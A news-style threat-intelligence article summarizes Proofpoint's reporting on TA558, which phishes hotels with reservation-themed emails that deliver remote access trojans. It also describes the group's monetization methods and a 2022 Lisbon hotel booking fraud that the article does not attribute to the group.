This year, a hacker identified as TA558 has increased its activities, launching phishing attempts against numerous hotels and businesses in the hospitality and leisure industries.
The threat actor gains access to the target systems, conducts surveillance, steals crucial data, and ultimately embezzles money from clients using a series of 15 different malware families, mostly remote access trojans (RATs). Proofpoint has noticed an increase in TA558 activity recently, which may be related to the tourism industry’s recovery after two years of COVID-19 limitations. TA558 has been active at least since 2018.
Latest Campaigns by TA558
By 2022, TA558 had abandoned the use of documents with embedded macros in its phishing emails in favor of RAR and ISO file attachments or embedded URLs. In reaction to Microsoft’s decision to disable VBA and XL4 macros in Office, which hackers historically exploited for delivering, dropping, and installing malware via infected documents, other threat actors have undergone similar alterations. Written in English, Spanish, and Portuguese, the phishing emails that start the infection chain are sent to businesses in North America, Western Europe, and Latin America.
The emails are about making reservations with the target company and pose as correspondence from conference planners, travel brokers, and other hard-to-reject sources. The URL in the message body, which is supposed to be a link for making a reservation, will deliver an ISO file to victims who click on it. A batch file in the bundle starts a PowerShell script that ultimately downloads the RAT payload to the victim’s PC and sets up a scheduled job for persistence.
After infecting hotel systems with RAT malware, TA558 penetrates the network further to steal customer information, store credit card information, and alter websites that guests interact with to reroute funds for reservations.
The Marino Boutique Hotel in Lisbon, Portugal, had its Booking.com account hacked in July 2022. The hacker stole €500,000 from unwary customers who had paid to book a room over the course of four days.
Although TA558’s involvement in that incident was not established, it does match the threat actor’s TTP and targeting range and at the very least provides an illustration of how they might profit from their access to hotel systems.
Other options for TA558 to gain money include selling or using the credit card information that was taken, selling customer PII, extorting wealthy people, or giving ransomware groups access to the hotel’s network.
